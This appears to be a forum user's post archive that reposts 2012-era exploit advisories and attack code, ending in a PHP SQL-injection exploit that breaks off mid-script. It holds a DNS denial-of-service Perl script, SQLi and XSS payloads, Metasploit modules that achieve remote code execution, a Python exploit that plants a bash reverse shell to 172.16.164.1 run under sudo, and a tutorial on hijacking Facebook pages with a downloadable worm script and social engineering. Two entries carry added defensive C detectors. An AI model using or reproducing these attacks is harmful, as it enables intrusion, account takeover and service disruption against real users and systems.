Everything posted by The_Arhitect
-
Tftpd32 DNS Server 4.00 Denial Of Service

Title: Tftpd32 DNS Server Denial Of Service Vulnerability
Software: Tftpd32
Software Version: v4.00
Vendor: http://tftpd32.jounin.net/
Vulnerability Published: 2012-05-26
Vulnerability Update Time:
Status:
Impact: Medium (CVSS2 Base: 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description:
Tftpd32 is a free TFTP and DNS server for Windows (freeware TFTP server). The DNS server binds UDP port 53, but it does not validate the domain option size, which leads to a Denial of Service flaw when more than 127 characters are sent to it.

Solution:
Tftpd32's DNS server can drop the evil request when it detects that the domain option size is longer than 127 characters.

Proof Of Concept:
-----------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
use Socket;
use Math::BigInt;
$|=1;
$host=shift;
$port=shift || '53';
die "usage: $0 \$host [\$port]\n" if(!defined($host));
$target_ip = inet_aton($host);
$target = sockaddr_in($port, $target_ip);
$crash='A'x128;
$transaction_id_count=1;

sub dns_struct_pack($){
    $domain=shift;      #domain
    $type="\x00\xff";   #dns_type = ANY
    $transaction_id_count=1 if($transaction_id_count > 255);
    $x=Math::BigInt->new($transaction_id_count);
    $x=~s/0x//;
    $transaction_id=sprintf("\x00".chr($x));
    $flag="\x01\x00";
    $question="\x00\x01";
    $answer_rrs="\x00\x00";
    $authority_rrs="\x00\x00";
    $additional_rrs="\x00\x00";
    if($domain ne '0'){
        undef($domain_length);
        $domain_length=length($domain);
        $y=Math::BigInt->new($domain_length);
        $y=~s/0x//;
        $domain_length=chr($y);
    }
    $class="\x00\x01";  #IN
    $transaction_id_count++;
    if($domain eq '0'){
        $packet_struct="$transaction_id"."$flag"."$question"."$answer_rrs"."$authority_rrs"."$additional_rrs"."\x00"."$type"."$class";
    }else{
        $packet_struct="$transaction_id"."$flag"."$question"."$answer_rrs"."$authority_rrs"."$additional_rrs"."$domain_length"."$domain"."\x00"."$type"."$class";
    }
    return $packet_struct;
}

print "Launch attack ... ";
socket(SOCK1, AF_INET, SOCK_DGRAM, 17);
send(SOCK1, &dns_struct_pack($crash), 0, $target);
close(SOCK1);
print "Finish!\n";
exit(0);
-----------------------------------------------------------

Credits:
This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK

Source: Tftpd32 DNS Server 4.00 Denial Of Service
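The advisory's "Solution" is a server-side length check on the question name. The C code below is an added example (not part of the advisory and not Tftpd32's code) of what that check looks like when done against the wire format: it walks the QNAME of a raw DNS query and refuses any label longer than 63 octets or any name longer than 255 octets (the RFC 1035 limits, which are stricter than the advisory's 127-character threshold), before any byte of the name is copied anywhere. Note that the PoC's single length octet of 128 (0x80) has its high bit set, a pattern RFC 1035 reserves for compression pointers and extended label types, so a 63-octet label limit rejects it outright. The packet builder and the two sample packets are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DNS_HEADER_LEN 12
#define DNS_MAX_LABEL  63   /* RFC 1035 2.3.4: one label is at most 63 octets */
#define DNS_MAX_NAME   255  /* RFC 1035 2.3.4: a whole encoded name is at most 255 */

enum dns_verdict {
    DNS_OK = 0,
    DNS_ERR_SHORT,      /* packet ends before the question section is complete */
    DNS_ERR_QDCOUNT,    /* header does not announce exactly one question */
    DNS_ERR_LABEL_LEN,  /* length octet > 63 (also catches pointer/reserved bit patterns) */
    DNS_ERR_NAME_LEN    /* encoded QNAME would exceed 255 octets */
};

/* Validate the question section of a raw DNS query before anything is copied
 * out of it. On success *qname_len (if given) receives the encoded name length. */
enum dns_verdict dns_validate_query(const uint8_t *pkt, size_t len, size_t *qname_len)
{
    size_t pos = DNS_HEADER_LEN, name_len = 0;
    if (len < DNS_HEADER_LEN) return DNS_ERR_SHORT;
    if (((pkt[4] << 8) | pkt[5]) != 1) return DNS_ERR_QDCOUNT;

    for (;;) {
        if (pos >= len) return DNS_ERR_SHORT;
        uint8_t l = pkt[pos++];
        name_len++;                                   /* the length octet itself */
        if (l == 0) break;                            /* root label ends the name */
        if (l > DNS_MAX_LABEL) return DNS_ERR_LABEL_LEN;
        if (name_len + l + 1 > DNS_MAX_NAME) return DNS_ERR_NAME_LEN; /* +1 for root */
        if (pos + l > len) return DNS_ERR_SHORT;
        pos += l;
        name_len += l;
    }
    if (pos + 4 > len) return DNS_ERR_SHORT;          /* QTYPE and QCLASS */
    if (qname_len) *qname_len = name_len;
    return DNS_OK;
}

/* Constructed query for example.com, QTYPE A, QCLASS IN (29 bytes). */
const uint8_t example_com_query[29] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 3, 'c', 'o', 'm', 0,
    0x00, 0x01, 0x00, 0x01
};

/* Build a constructed query whose QNAME is one label of label_len 'A's followed
 * by the root, QTYPE ANY, QCLASS IN (the shape the PoC above sends). Returns the
 * packet length, or 0 if cap is too small. */
size_t build_single_label_query(uint8_t *out, size_t cap, uint8_t label_len)
{
    static const uint8_t hdr[DNS_HEADER_LEN] = {0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0};
    size_t p = DNS_HEADER_LEN;
    if (cap < DNS_HEADER_LEN + 1u + label_len + 1u + 4u) return 0;
    memcpy(out, hdr, DNS_HEADER_LEN);
    out[p++] = label_len;
    memset(out + p, 'A', label_len);
    p += label_len;
    out[p++] = 0x00;                          /* root */
    out[p++] = 0x00; out[p++] = 0xff;         /* QTYPE ANY */
    out[p++] = 0x00; out[p++] = 0x01;         /* QCLASS IN */
    return p;
}

/* Verdict for a single-label query of the given label length. */
enum dns_verdict check_single_label(uint8_t label_len)
{
    uint8_t pkt[320];
    size_t n = build_single_label_query(pkt, sizeof pkt, label_len);
    return n ? dns_validate_query(pkt, n, NULL) : DNS_ERR_SHORT;
}

int main(void)
{
    static const char *names[] = {"OK", "SHORT", "QDCOUNT", "LABEL_LEN", "NAME_LEN"};
    size_t qn = 0;
    printf("example.com query: %s (qname %zu octets)\n",
           names[dns_validate_query(example_com_query, sizeof example_com_query, &qn)], qn);
    printf("63-byte label:  %s\n", names[check_single_label(63)]);
    printf("128-byte label: %s\n", names[check_single_label(128)]);
    return 0;
}
```

The check is deliberately done on the encoded form rather than on a dotted string, because the length octets are what an unchecked copy into a fixed buffer trusts; a server that fails `dns_validate_query` should drop the datagram without parsing further.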
-
PHP Volunteer Management System v 1.0.2 multiple SQLi Vuln.

# Title: PHP Volunteer Management System v 1.0.2 multiple SQLi Vulnerabilities
# Version: 1.0.2
# Author/Found by: loneferret
# Software Site: https://sourceforge.net/projects/phpvolunteer/
# Other vulnerabilities: http://www.exploit-db.com/exploits/18941/
# Date found: May 28th 2012
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23

# Vulnerability:
# Due to improper sanitation, many of the parameters are injectable,
# some need to be authenticated, others not.
# As always have fun...

PoC:

Page: index.php
Parameter: ?p=
Method: GET
Payload: /?p=dashboard' and sleep(5) and '1'='1
Payload: /?p=login' and sleep(5) and '1'='1

Other affected parameters can be found in the message section of the application when reading or deleting a message.

Parameter: id=
Url: /?p=read_message&id=2
Payload: /?p=read_message&id=-1' or '1'='1

Possible output:
[10:00:02] [INFO] searching database 'bf102'
[10:00:02] [INFO] the SQL query used returns 1 entries
[10:00:02] [INFO] resumed: "bf102"
found databases [1]:
[*] bf102

Source: PHP Volunteer Management System v 1.0.2 multiple SQLi Vuln.
-
PHP Volunteer Management System v 1.0.2 Multiple Vulnerabilities

# Exploit Title: PHP Volunteer Management System v 1.0.2 Multiple Vulnerabilities
# Date: 05/28/12
# Author: Ashoo
# Mail: ashoo.online@gmail.com
# Software Site: https://sourceforge.net/projects/phpvolunteer/
# Version: 1.0.2
# Tested on: IIS6.0-Windows 2003

##### ToC #####
1.0 Introduction
2.0 Unrestricted File Upload
3.0 Persistent XSS

##### 1.0 Introduction #####
This is a PHP Volunteer Management software. Keep track of Volunteer hours worked and location assignments. This system is built on PHP/MySql.

##### 2.0 Unrestricted File Upload #####
Bug: The upload document (personal or shared) functionality of the application allows unrestricted file upload. This can be abused by the attacker to upload a backdoor to the webserver.

PoC:
http://192.168.6.12/?p=upload_shared_document - Shared document upload
http://192.168.6.12/?p=upload_personal_document - personal document upload

Upload a php backdoor (r57, c99, etc) to the server. The backdoor shell will be uploaded to the mods/documents/uploads/ directory. It will provide complete control over the webserver.

##### 3.0 Persistent XSS #####
Bug: The persistent cross site scripting vulnerability exists in the "add news information" section. A remote attacker with privileges can exploit this vulnerability.

PoC:
http://localhost/?p=add_news_information
In the "Information to Display" text box insert the following test strings
<script> alert("xss me"); </script>
fill other entries and submit!
switch to the dashboard or login page, it is getting executed

#########
#Ash00!!#
#########

Source: PHP Volunteer Management System v 1.0.2 Multiple Vulnerabilities
-
Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in Symantec Web Gateway's HTTP
        service. By injecting PHP code in the access log, it is possible to load it
        with a directory traversal flaw, which allows remote code execution under the
        context of 'apache'. Please note that it may take up to several minutes to
        retrieve access_log, which is about the amount of time required to see a
        shell back.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',  #Discovery
          'muts',     #PoC
          'sinn3r'    #Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2012-0297'],
          ['EDB', '18932'],
          ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'WfsDelay'              => 300,  #5 minutes
          'DisablePayloadHandler' => 'false',
          'ExitFunction'          => "none"
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Symantec Web Gateway 5.0.2.8', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 17 2012",
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => '/spywall/login.php'
    })

    if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    peer = "#{rhost}:#{rport}"
    php = %Q|<?php #{payload.encoded} ?>|

    # Inject PHP to log
    print_status("#{peer} - Injecting PHP to log...")
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "/#{php}"
    })
    select(nil, nil, nil, 1)

    # Use the directory traversal to load the PHP code
    # access_log takes a long time to retrieve
    print_status("#{peer} - Loading PHP code..")
    send_request_raw({
      'method' => 'GET',
      'uri'    => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log'
    })

    print_status("#{peer} - Waiting for a session, may take some time...")
    select(nil, nil, nil, 1)
    handler
  end
end

Source: Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability
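Both stages of the technique this module describes leave a trace in the web server's own access log: the PHP tag planted in the request path, and the later `relfile=../../...` request that reads the log back. The C code below is an added example (not the module's code and not Symantec's) of a small detector that a defender can run over `access_log` lines: it extracts the quoted request field from a Common Log Format line, percent-decodes it so `%3C%3F` is seen as `<?`, and flags PHP open tags and `../` traversal sequences. The four log lines are constructed for the example; the traversal path is the one quoted in the module.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LOG_FLAG_PHP_TAG   1   /* "<?" appears in the decoded request target */
#define LOG_FLAG_TRAVERSAL 2   /* "../" appears in the decoded request target */

/* Copy the quoted request line ("GET /x HTTP/1.1") out of a Common Log Format
 * line into dst, percent-decoding it on the way. Returns 0 if no quoted field. */
static int extract_request(const char *line, char *dst, size_t cap)
{
    const char *q1 = strchr(line, '"');
    if (!q1) return 0;
    const char *q2 = strchr(q1 + 1, '"');
    if (!q2) return 0;
    size_t o = 0;
    for (const char *p = q1 + 1; p < q2 && o + 1 < cap; p++) {
        if (*p == '%' && p + 2 < q2 &&
            isxdigit((unsigned char)p[1]) && isxdigit((unsigned char)p[2])) {
            char hex[3] = { p[1], p[2], 0 };
            dst[o++] = (char)strtol(hex, NULL, 16);   /* decode %XX */
            p += 2;
        } else {
            dst[o++] = *p;
        }
    }
    dst[o] = 0;
    return 1;
}

/* Bitmask of LOG_FLAG_* values for one access-log line (0 = nothing suspicious). */
int classify_log_line(const char *line)
{
    char req[1024];
    int flags = 0;
    if (!extract_request(line, req, sizeof req)) return 0;
    if (strstr(req, "<?"))  flags |= LOG_FLAG_PHP_TAG;
    if (strstr(req, "../")) flags |= LOG_FLAG_TRAVERSAL;
    return flags;
}

/* Constructed sample lines in Apache Common Log Format. */
const char *sample_log[] = {
    "10.0.0.5 - - [17/May/2012:10:00:01 +0000] \"GET /spywall/login.php HTTP/1.1\" 200 1532",
    "10.0.0.9 - - [17/May/2012:10:00:02 +0000] \"GET /<?php echo 1; ?> HTTP/1.1\" 404 210",
    "10.0.0.9 - - [17/May/2012:10:00:03 +0000] \"GET /%3C%3Fphp%20echo%201%3B%20%3F%3E HTTP/1.1\" 404 210",
    "10.0.0.9 - - [17/May/2012:10:00:04 +0000] \"GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\" 200 88310",
};
const size_t sample_log_count = sizeof sample_log / sizeof sample_log[0];

/* Number of sample lines carrying at least one flag. */
size_t count_flagged(void)
{
    size_t n = 0;
    for (size_t i = 0; i < sample_log_count; i++)
        if (classify_log_line(sample_log[i])) n++;
    return n;
}

int main(void)
{
    for (size_t i = 0; i < sample_log_count; i++) {
        int f = classify_log_line(sample_log[i]);
        printf("line %zu: %s%s%s\n", i + 1,
               f & LOG_FLAG_PHP_TAG ? "PHP_TAG " : "",
               f & LOG_FLAG_TRAVERSAL ? "TRAVERSAL " : "",
               f ? "" : "clean");
    }
    return 0;
}
```

Decoding before matching matters because the log stores the request line as received; the third sample line is the same PHP tag as the second, only percent-encoded, and would slip past a plain substring match. Seeing a PHP-tag hit followed by a traversal hit from the same client is the sequence worth alerting on.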
-
How to Hack Facebook Fan Page

FIRST DO ME A FAVOUR TAKES 5 SECONDS ! if you like this tutorial then say great thanks or whatever u want nicely

Now lets start the tutorial. First of all we will need to set up an exploit and a website to host the exploit. If you already have a hosting then its great, otherwise there are a couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.

1. Download the exploit from this: Download HackPages At facebook rar, fast and secure downloading from crocko.com

2. After downloading it, you need to edit it. Get notepad++, one of my hot favorite editors. You can download it from Notepad++ v5.9.8

3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.

4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the slave. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be a social engineer and rename it to something more attractive like getprizes.js or booster.js)

5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won't help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows: http://www.yoursite.0fess.net/booster.js

6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don't forget to replace the text in bold with the address of your script) in his browser's address bar and hit enter while he is on Facebook.

Code:
-
Hacker Highschool Ebook Collection

http://www.mediafire.com/?ddb7cdry7y7xb7n

Source: Hacker Highschool - Lessons
-
SocialEngine 4.2.2 Multiple Vulnerabilities

Social Engine 4.2.2 Multiple Vulnerabilities
Earlier versions are also possibly vulnerable.

INFORMATION

Product: Social Engine 4.2.2
Remote-Exploit: yes
Vendor-URL: http://www.socialengine.net/
Discovered by: Tiago Natel de Moura aka "i4k"
Discovered at: 10/04/2012
CVE Notified: 10/04/2012
CVE Number: CVE-2012-2216

OVERVIEW

Social Engine version 4.2.2 is vulnerable to XSS and CSRF.

INTRODUCTION

SocialEngine is a PHP-based white-label social networking service platform that provides features similar to a social network on a user's website. Main features include administration of small-to-mid scale social networks, some customization abilities, unencrypted code, multilingual capability, and modular plugin/widget compatibility. There is a range of templates and add-ons available to extend the basic features already included in the SocialEngine core.

VULNERABILITY DESCRIPTION

== Persistent XSS in music upload. ==

CWE-79: http://cwe.mitre.org/data/definitions/79.html
The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Proof Of Concept:

POST http://localhost/index.php/music/create
POST data without form-data enctype:
title=<script>alert(document.cookie);</script>&description=teste
&search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename=
&fancyuploadfileids=15

== Persistent XSS in creating events ==

POST http://localhost/socialengine/socialengine422_trial/index.php/events/create
POST data without form-data enctype:
title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012&
starttime[hour]=1&starttime[minute]=0&starttime[ampm]=AM&endtime[date]=4/12/2012
&endtime[hour]=1&endtime[minute]=0&endtime[ampm]=AM&host=teste
&location=<script>alert(document.cookie);</script>&MAX_FILE_SIZE=8388608&
photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1&
auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit=

== Reflected XSS in search form of events area. ==

Direct javascript injected:
POST http://localhost/index.php/widget/index/content_id/644
format=html&subject=event_1&search=';alert(document.cookie);var a = '

Proof of Concept:
- Go to URL: /index.php/event/$EVENT_ID
- Click on the "Guests"
- Click in "Search guests" form
- Submit: ';alert(document.cookie); var a = '
You will see your PHPSESSID in the alert.

== Multiple CSRF vulnerabilities ==

CWE-352: http://cwe.mitre.org/data/definitions/352.html
The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

A CSRF in the plugin "Forum" allows forcing the owner of the event to do some activities such as:
Close a topic: GET /index.php/forums/topic/4/example-topic/close/close/1
Open a topic: GET /index.php/forums/topic/4/example-topic/close/close/0

A CSRF in the plugin "Event" allows forcing the owner of the event to do some activities such as:
Close the event: GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2
Open the event: GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2
"Watch Topic": GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2
"Stop Watching Topic": GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2

A CSRF in the plugin "Classifieds" allows forcing the owner of the event to do some activities such as:
Open the classified listing: GET /index.php/classifieds/close/1/closed/0
Close the classified listing: GET /index.php/classifieds/close/1/closed/1

VERSIONS AFFECTED

Tested with version 4.2.2 but earlier versions are possibly vulnerable.

SOLUTION

Upgrade to Social Engine 4.2.4.

NOTES

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2012-2216 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

CREDITS

Tiago Natel de Moura aka "i4k"
SEC+ Information Security Company - http://www.secplus.com.br/
BugSec Security Team - http://bugsec.googlecode.com/

--
Tiago Natel de Moura
IT Security Consultant
http://www.linkedin.com/in/tiagonatel
http://www.secplus.com.br/
http://github.com/tiago4orion
http://code.google.com/p/bugsec

Source: SocialEngine 4.2.2 Multiple Vulnerabilities
-
appRain CMF Arbitrary PHP File Upload Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "appRain CMF Arbitrary PHP File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in appRain's Content Management
        Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a
        malicious user can upload a file to the uploads/ directory without any
        authentication, which results in arbitrary code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'EgiX',    #Discovery, PoC
          'sinn3r'   #Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2012-1153'],
          ['OSVDB', '78473'],
          ['EDB', '18392']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "none"
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['appRain 0.1.5 or less', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 19 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}addons/uploadify/uploadify.php"
    })

    if res and res.code == 200 and res.body.empty?
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'

    post_data = "--o0oOo0o\r\n"
    post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"
    post_data << "<?php "
    post_data << payload.encoded
    post_data << " ?>\r\n"
    post_data << "--o0oOo0o\r\n"

    print_status("#{peer} - Sending PHP payload (#{payload_name})")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}addons/uploadify/uploadify.php",
      'ctype'  => 'multipart/form-data; boundary=o0oOo0o',
      'data'   => post_data
    })

    # If the server returns 200 and the body contains our payload name,
    # we assume we uploaded the malicious file successfully
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      print_error("#{peer} - I don't think the file was uploaded. Abort!")
      return
    end

    print_status("#{peer} - Executing PHP payload (#{payload_name})")
    # Execute our payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}addons/uploadify/uploads/#{payload_name}"
    })

    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either. Print the status code for debugging purposes.
    if res and res.code != 200
      print_status("#{peer} - Server returns #{res.code.to_s}")
    end
  end
end

Source: appRain CMF Arbitrary PHP File Upload Vulnerability
-
Symantec Web Gateway 5.0.2 Remote LFI Root Exploit

#!/usr/bin/python
# Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept
# Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable.
# muts at offensive-security dot com

import socket
import base64

payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''
payloadencoded=base64.encodestring(payload).replace("\n","")
taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("172.16.164.129", 80))
expl.send(taint)
expl.close()

trigger="GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\r\n\r\n"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("172.16.164.129", 80))
expl.send(trigger)
expl.close()

Source: Symantec Web Gateway 5.0.2 Remote LFI Root Exploit
-
RabidHamster R4 Log Entry sprintf() Buffer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "RabidHamster R4 Log Entry sprintf() Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in RabidHamster R4's web server.
        By supplying a malformed HTTP request, it is possible to trigger a stack-based
        buffer overflow when generating a log, which may result in arbitrary code
        execution under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma',  #Discovery, PoC
          'sinn3r'           #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '79007'],
          ['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],
          ['URL', 'http://secunia.com/advisories/47901/']
        ],
      'Payload'        =>
        {
          'StackAdjustment' => -3500,
          'BadChars'        => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20"
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "process"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['R4 v1.25', {'Ret'=>0x73790533}]  #JMP ESI (ddraw.dll)
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 09 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'The remote port', 8888])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => '/'
    })

    if res and res.headers['Server'] == 'R4 Embedded Server'
      return Exploit::CheckCode::Detected
    else
      # original read Exploit::CheckCoded::Safe, a typo for the CheckCode constant
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    buf = ''
    buf << payload.encoded
    buf << rand_text_alpha(2022-buf.length, payload_badchars)
    buf << [target.ret].pack("V*")
    buf << pattern_create(200)
    buf << rand_text_alpha(3000-buf.length, payload_badchars)

    send_request_cgi({
      'method' => 'GET',
      'uri'    => "/?#{buf}"
    })
  end
end

Source: RabidHamster R4 Log Entry sprintf() Buffer Overflow
-
Vanilla FirstLastNames 1.3.2 Plugin Persistent XSS

# Title: Vanilla FirstLastNames 1.3.2 Plugin Persistent XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + FirstLastNames 1.3.2 http://vanillaforums.org/addon/firstlastnames-plugin
# http://vanillaforums.org
#############################################################

On Edit your account enter your XSS string in either the first name or last name field.
Then if a user visits your page the XSS will execute.

http://target.tld/index.php?p=/profile/myprofile/1/user

XSS: <script>alert('x')</script>

#############################################################
http://henryhoggard.co.uk

Source: Vanilla FirstLastNames 1.3.2 Plugin Persistent XSS
-
Vanilla Forums About Me Plugin Persistent XSS

# Title: Vanilla About Me Plugin Persistent XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + About Me 1.1.1
# http://vanillaforums.org/addon/aboutme-plugin
# http://vanillaforums.org
#############################################################

Go to http://target.tld/index.php?p=/profile/editme/4/testmember
Post your XSS in any of the text fields; for this we used the Real Name field and the following XSS

XSS: <script>alert('x')</script>

Then if a user visits your about me page (http://target.tld/index.php?p=/profile/aboutme/4/testmember) the script will execute

#############################################################
http://henryhoggard.co.uk

Source: Vanilla Forums About Me Plugin Persistent XSS
-
Supernews <= 2.6.1 SQL Injection Exploit

<?php
# Exploit Title: Supernews <= 2.6.1 SQL Injection Exploit
# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
# Date: 2012/
# Author: WhiteCollarGroup
# Software Link: http://phpbrasil.com/script/vT0FaOCySSH/supernews
# Version: 2.6.1
# Tested on: Debian GNU/Linux

/*
Exploit for educational purpose only.
Note sent to the developer Fernando Pontes by e-mail odnanrefsetnop@bol.com.br

SuperNews is a Brazilian news system in PHP and MySQL.
Versions prior to 2.6 have a simple SQL Injection on view news.
The developer tried to fix the bug by removing keywords like "union" and "select".
But, with a recursion, it's possible to bypass these filters. See:
seselectlect
After removing the "select" word, another "select" word will remain. See more:
seSELECTlect

Another SQL Injection on the administration panel:
When deleting a post, you can inject SQL to delete all news on the database.

Another vulnerability allows deleting files, on the administration panel:
When deleting a post, a variable called "unlink" tells the system the news image to delete.
But it's possible to delete other files, typing the full file path or using "../".

Usage:
php exploit.php http://target.com/supernews/
For more info about vulnerabilities:
php exploit.php moreinfo

Example:
$ php exploit.php http://target.com/news/

Supernews <= 2.6.1 SQL Injection Exploit
Coded by WhiteCollarGroup - www.wcgroup.host56.com
Use at your own risk.

[*] Trying to access server...
[*] Detecting version...
[!] Version: >2.6.1
[!] Administration panel: http://target.com/news/admin/adm_noticias.php
[i] Type "exploit.php moreinfo" for get others vulnerabilities.
[*] Getting user & pass 8-]
User: user1
Pass: pass1
User: user2
Pass: pass2

Good luck!
*/

error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);

function hex($string){
    $hex=''; // PHP 'Dim' =]
    for ($i=0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    }
    return '0x'.$hex;
}

function str_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) {
    $count = 0;
    $offset = strpos($haystack, $needle);
    //If we don't replace the first, go ahead and skip it
    if (!$replace_first) {
        $offset += strlen($needle);
        $offset = strpos($haystack, $needle, $offset);
    }
    while ($offset !== false) {
        $haystack = substr_replace($haystack, $replace, $offset, strlen($needle));
        $count++;
        $offset += strlen($replace);
